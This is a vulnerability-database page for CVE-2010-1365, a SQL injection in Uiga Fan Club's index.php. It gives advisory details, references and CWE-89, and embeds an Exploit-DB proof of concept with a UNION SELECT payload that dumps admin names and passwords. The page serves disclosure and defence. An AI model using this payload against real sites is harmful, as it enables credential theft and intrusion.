CVE-2010-1365
Description
SQL injection vulnerability in index.php in Uiga Fan Club, as downloaded on 20100310, allows remote attackers to execute arbitrary SQL commands via the id parameter in a photos action.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Uiga Fan Club - SQL Injection
# Exploit Title: Uiga Fan Club SQL Injection Vulnerability
# Date: 22/03/2010
# Author: Sioma Labs
# Site : http://www.scriptdevelopers.net/products/ufc.html
# Software Link: http://www.scriptdevelopers.net/download/uigafanclub.zip
# Version: N/A
# Tested on: Win (Wamp)
# CVE : N/A
__ _ __ _
/ _(_) ___ _ __ ___ __ _ / / __ _| |__ ___
\ \| |/ _ \| '_ ` _ \ / _` | / / / _` | '_ \/ __|
_\ \ | (_) | | | | | | (_| | / /___ (_| | |_) \__ \
\__/_|\___/|_| |_| |_|\__,_| \____/\__,_|_.__/|___/
Exploit :
http://site/index.php?view=photos&id=[SQLi]
Example :
http://localhost/uigafan/index.php?view=photos&id=-7 Union Select 1,2,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),4,5 from admin--
#Sioma Labs
#siomalabs.com
#Sioma Agent 154
Uiga Fan Club - 'index.php' SQL Injection
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| uiga | fan_club | 1.0 | |
References
- http://4004securityproject.wordpress.com/2010/02/28/uigafanclub-index-php-sql-injection/
- http://packetstormsecurity.org/1002-exploits/uigafc-sql.txt
- http://secunia.com/advisories/38756
- http://www.exploit-db.com/exploits/11600
- http://www.vupen.com/english/advisories/2010/0487
- http://4004securityproject.wordpress.com/2010/02/28/uigafanclub-index-php-sql-injection/
- http://packetstormsecurity.org/1002-exploits/uigafc-sql.txt
- http://secunia.com/advisories/38756
- http://www.exploit-db.com/exploits/11600
- http://www.vupen.com/english/advisories/2010/0487
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.